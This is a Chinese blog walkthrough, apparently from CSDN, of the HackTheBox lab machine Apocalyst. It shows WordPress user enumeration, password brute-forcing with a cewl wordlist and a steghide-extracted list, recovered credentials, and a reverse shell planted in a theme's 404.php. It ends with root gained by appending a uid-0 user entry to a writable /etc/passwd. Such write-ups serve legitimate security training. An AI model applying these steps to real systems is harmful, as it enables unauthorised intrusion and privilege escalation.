hackthebox - Apocalyst (考点:cewl 生成字典 & 图片解密& wordpress & 修改/etc/passwd提权)

最新推荐文章于 2022-07-15 22:48:58 发布
最新推荐文章于 2022-07-15 22:48:58 发布
阅读量375 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106419017
版权

1 扫描

常规22想到可能有ssh登录,80进网页搜集信息,扫描也提示了是wp博客

C:\root> nmap -A 10.10.10.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 20:21 EDT
Nmap scan report for 10.10.10.46
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
|   256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
|_  256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apocalypse Preparation Blog
No exact OS matches for host (If you know what

2 cewl 字典 & wp拿shell &

边dirbuster扫目录,边wpscan扫wp博客的用户和插件
wp博客一般是要么拿到账号密码进去改theme的php拿shell,要么通过插件漏洞。
不过我们现在账号密码都没有。
扫出来一个用户名。

wpscan --url http://10.10.10.46 --enumerate p,u

再看dirbuster目录扫描,基本都是同一张图片,下载下来解密stringssteghide extract -sf都没什么鸟用
也未找到其他价值信息能透露密码。真的让人很捉急。

这个时候我尝试直接用wpscan + rockyou.txt暴力解密,但是看进度条要等n久。
我又用cewl爬虫爬网站生成新字典,看是否有效

cewl -w apoc.txt http://10.10.10.46

再wpscan直接用这个字典解密,没效。
换dirbuster扫这个字典做目录
倒有个新玩意right开头的那个,size明显的不一样了。
看前端码ctrl+u也有新提示
虽然打开看还是那张老图,但十有八九有突破口就是他了。
在这里插入图片描述
下载下来再看看解密能否有新东东

steghide extract -sf index.jpeg

出来一个新字典
在这里插入图片描述
再拿这个字典解用户的密码

wpscan --url http://10.10.10.46 -U falaraki -P list.txt -t 20

提示成功
在这里插入图片描述

falaraki / Transclisiation

ok找登录框进去,无非不就是wp-login或admin之类的
wp-login那里输入,但是跳转却失败
网址那里显示的是新dns地址
在这里插入图片描述
把这个新地址加到本机的/etc/hosts

10.10.10.46 apocalyst.htb

再登录就ok了

直接采用改theme editor。 找个主题,改它的php页面,随便选,我选404那个
里面换上自己的弹shell 的php代码,我一般用pentestmonkey的那个,改好ip端口
在这里插入图片描述
完后就是开监听,找目录点击执行这个php了。
因为我选的是27主题,所以点击这个,theme一般就在这个目录下,做多了就知道了。

http://10.10.10.46/wp-content/themes/twentyseventeen/404.php

收到。tty,没有Python,而是Python3 python3 -c 'import pty; pty.spawn("/bin/bash")'

3 提权

老套路linpeas.sh自动扫
oh!直接能改用户登录清单/密码表/etc/passwd。还是第一次见这么直接露骨的。
随便伪造一个用户,伪造密码,加进去,给他root权限,不就搞定了。
在这里插入图片描述
以前做的一些靶机都是花式改比如dc9。通过其他方法间接改密码表,然后提权。

这次这么直捣黄龙,岂不更简单了,dc9里我伪造的666用户666密码,这次直接拿来用,不香吗?不666吗?
用echo或nano或vim随便,修改它,加到最后一行

666:sat087sUBmRKY:0:0::/root:/bin/bash

在这里插入图片描述
直接切用户su 666 。输入666,你就是root了666!
在这里插入图片描述

冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cewl工具(URL字典生成器)
墨痕诉清风的博客
08-18 878
cewl工具(URL字典生成器)
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 421
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
Cannot lock /etc/passwd; try again later
热门推荐
jefby的专栏
02-15 2万+
在CentOS6.5中为系统创建用户wordpress的时候,发现提示错误"can't lock /etc/passwd;try again later"问题,经google搜索,原来是因为在/etc目录下存在着passwd.lock锁文件,删除即可。 $ cd /etc $ ls *.lock $  rm -f *.lock //删除文件锁 $ usera
hack the box vaccine 靶场练习
鸥鹭忘机
08-01 1792
收集信息 连接hack the box服务器后第一步依然是扫描靶机。 nmap -sV -sS -F 10.10.10.46 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。 ftp 10.10.10.46 //然后更具提示输入账号和密码 ls 发现了一个backup.zip,把它下载下来并解压。 如果被防火墙拦截则可以开启被
No.112-HackTheBox-Linux-Apocalyst-Walkthrough渗透学习
qq_34801745的博客
05-25 310
** HackTheBox-Linux-Nineveh-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/57 靶机难度:初级(3.5/10) 靶机发布日期:2017年10月10日 靶机描述: Apocalyst is a fairly straightforward machine, however it requires a wide range of tools and techniques to complete.
hackthebox -tenten (考点wordpress job插件 /图片解密/ ssh2john解密 / )
冬萍子癸水
05-23 573
1 扫描 很常规,22想到可能有ssh登录,80进web搜集信息。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.10 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-23 01:07:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating S
linux终端设置es副本数,ES集群分片及副本调整
weixin_42514433的博客
05-11 1742
分片shardsES是个分布式的搜索引擎,所以索引通常都会分解成不同部分,而这些分布在不同节点的数据就是分片.ES自动管理和组织分片,并在必要的时候对分片数据进行再平衡分配副本replicas为了提升访问压力过大是单机无法处理所有请求的问题,Elasticsearch集群引入了副本策略replica。副本策略对index中的每个分片创建冗余的副本,处理查询时可以把这些副本当做主分片来对待(p...
gcwl:Golang自定义单词列表生成器-基于CeWL
05-18
c Golang自定义单词列表生成器 归因 该代码基于digininja的CeWL。 非常感谢digininja和该项目的所有贡献者!
hat:HAT(Hashcat自动化工具)-用于常见单词列表和规则的自动化Hashcat工具,可加快订婚过程中破解哈希的过程。 为基于Linux的系统而创建
04-25
HAT-Hashcat自动化工具 针对常见单词列表和规则的自动Hashcat工具,可加快订婚过程中破解哈希的过程。 HAT简直是Hashcat的包装(有一些额外的功能) - ,但是...Cewl Integration,用于查找在词典或违规列表中找不到的
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 ... ... 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 ...使用jerry用户通过git提权,进入root目录找到final_flag
wince sample -hello.rar
12-15
开发者需要熟悉WinCE特有的API,例如CEGUI、CEA (Windows CE Application Programming) 和CEWL (Windows CE Windows Layer)。 2. **设备驱动程序**:由于硬件多样性,开发驱动程序是Windows CE开发中的重要环节。...
靶机练习 narak ,个人学习心得
09-08
提权 在获取交互 shell 后,我们可以使用 BF 解码来获取 hell.sh 文件。BF 是一个功能强大的编码工具,可以帮助我们解码文件。例如:`https://www.splitbrain.org/services/ook`。这个命令可以帮助我们解码 hell.sh...
hackbox
5L2g556F5ZWl77yf
05-15 1337
Archetype 得到一个SSIS(SQL Server Integration Services )配置文件,和账户密码 百度前辈解题步骤,SQLServer 身份验证方式为 操作系统身份验证 https://docs.microsoft.com/en-us/sql/integration-services/lesson-1-4-adding-package-configurations?view=sql-server-2017 通msf连接 开启xp_cmdshell exec sp_confi
kali密码攻击工具——Cewl使用指南
systemino的博客
05-11 6738
大家好,今天我们主要讲解Linux字典生成工具cewl,并学习更多的高级参数用法。 cewl介绍 cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行工具应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。 链接:https:/...
kali工具 --- Cewl 字典生成
Beret-81的博客
03-25 1253
kali工具 -- Cewl 字典生成工具介绍:工具选项:使用例子: 工具介绍: Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。 工具下载:https://github.com/dig...
爬取网站生成字典的常用工具:cewl
weixin_41715662的博客
07-15 3730
cewl爬取网站生成字典的常用命令
hackthebox - Blocky (考点wordpress & jad java class反编译 &密码重复利用& linux基本提权知识)
冬萍子癸水
05-13 485
1 扫描 21想到ftp进去找文件,22可能有ssh登录,80进web搜集信息 C:\root> nmap -A 10.10.10.37 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 05:34 EDT Nmap scan report for 10.10.10.37 Host is up (0.26s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSI
html css js网页设计
最新发布
07-12
HTML、CSS和JavaScript是构建网页和网站的基本技术,它们共同工作来创建和设计用户界面。下面是关于这三种技术的详细介绍: ### HTML (HyperText Markup Language) - **定义**:HTML是构建网页内容的标准标记语言。 - **作用**:用于创建网页的结构和内容,如段落、链接、图片、表格等。 - **语法**:使用标签(如 `<p>`, `<div>`, `<a>`, `<img>` 等)来定义网页元素。 ### CSS (Cascading Style Sheets) - **定义**:CSS是一种样式表语言,用于描述HTML文档的呈现方式。 - **作用**:用于设置网页的布局、颜色、字体和其他视觉元素。 - **语法**:通过选择器(如 `p`, `.myclass`, `#myid` 等)应用样式规则。 ### JavaScript - **定义**:JavaScript是一种脚本语言,通常用于网页上实现交互功能。 - **作用**:允许网页与用户进行交互,如响应用户操作、动态更新内容、动画效果等。 - **语法**:Java
hydra怎么创建字典
05-04
要创建一个字典,可以按照以下步骤进行操作: 1. 收集可用于创建字典的信息。...4. 使用已有的字典进行组合,可以使用工具,如CeWL等。 需要注意的是,使用字典攻击来破解密码是一种不道德的行为,应该避免使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值